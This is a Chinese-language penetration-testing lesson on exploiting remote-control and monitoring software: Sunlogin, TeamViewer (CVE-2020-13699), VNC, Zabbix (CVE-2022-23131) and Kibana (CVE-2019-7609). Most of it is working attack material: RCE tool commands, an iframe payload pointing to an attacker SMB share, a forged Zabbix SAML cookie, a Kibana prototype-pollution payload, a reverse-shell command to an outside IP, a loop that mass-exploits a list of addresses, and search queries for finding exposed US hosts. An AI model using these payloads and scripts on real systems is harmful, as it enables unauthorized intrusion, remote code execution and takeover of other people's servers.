SEC-2022版-0045-服务攻防-04-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx

总览

知识点：

1、远程控制-第三方应用安全
2、三方应用-向日葵&VNC&TV
3、设备平台-Zabbix&Kibana漏洞

章节内容：

常见服务应用的安全测试：
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击

前置知识：

应用服务安全测试流程：见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等

实例

远程控制-向日葵&Vnc&Teamviewer

• 向日葵 RCE

  # 网络公开的exp工具：
  https://github.com/Mr-xn/sunlogin_rce
  xrkRce.exe -h 192.168.46.157 -t scan
  xrkRce.exe -h 192.168.46.157 -t rce -p 49712 -c "ipconfig"
  # 可以尝试fantanshell到自己的服务器

• Teamviewer

  通过网页调用出命令执行。CSRF办不到这点。

  <!DOCTYPE html>
  <html>
  <head>
      <title>cve-2020-13699</title>
  </head>
  <body>
      <p>Welcome to xiaodi!</p>                 <!-- 这是命令插入的位置 -->
      <iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
  </body>
  </html>

• VNC 口令问题&未授权
  MSF内置口令及未授权测试

设备平台-Zabbix-CVE-2022-23131(常见设备平台)

Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统，基于 Server-Client 架构。
是一款服务器监控软件，其由server、agent、web等模块组成，其中web模块由PHP编写，用来显示数据库中的结果。
默认端口：10051
app="ZABBIX-监控系统" && country="US"
app="ZABBIX-监控系统" && body="saml"

Zabbix CVE-2022-23131 登录绕过漏洞复现
手工复现
  使用游客登录
  抓取cookie的zbx_session部分，使用base64解码，
  {"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\/Pg=="}
  然后拼接字符串
  {"saml_data":{"username_attribute":"Admin"},"sessionid":"171b8009284462e1dda802aac899026c","sign":"ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\/Pg=="}
  拼接完成后进行base64编码，再在浏览器放入这个cookie（自己手动加载进去）使用saml登录即可

脚本实现的功能:
  https://github.com/L0ading-x/cve-2022-23131
  和上面差不多,脚本实现的功能是编码出最终的session
  python cve-2022-23131.py http://xxx.xxx.xxx.xxx Admin
  # python3 zabbix.py target Admin
 
漏洞利用：
  使用脚本拿下cookie后，登入服务器 ，写反弹shell脚本并且运行，
  然后修改Cookie，使用saml登录即可
  对方反弹出shell的话即运行成功。

剩下漏洞:
  CVE-2017-2824   条件过于苛刻,等于无用.
  CVE-2020-11800  同样是苛刻

设备平台-Kibana-CVE-2019-7609(常见设备平台)

Kibana为Elassticsearch设计的一款开源的视图工具。
其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞，
利用漏洞可以在目标服务器上执行任意代码。
默认端口：5601

https://github.com/LandGrey/CVE-2019-7609

python2 CVE-2019-7609-kibana-rce.py -u xxx.xxx.xxx.xxx(被攻击的IP地址) -host 45.11.55.58(我方服务器,等待反弹shell) -port 5566 --shell

可以写一个脚本进行批量测试.

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

import os
for i in open('ip.txt'):
  ip=ip.strip()
  cmdline="python2 CVE-2019-7609-kibana-rce.py -u %s -host 45.11.55.58 -port 5566 --shell"%ip
  os.system(cmdline)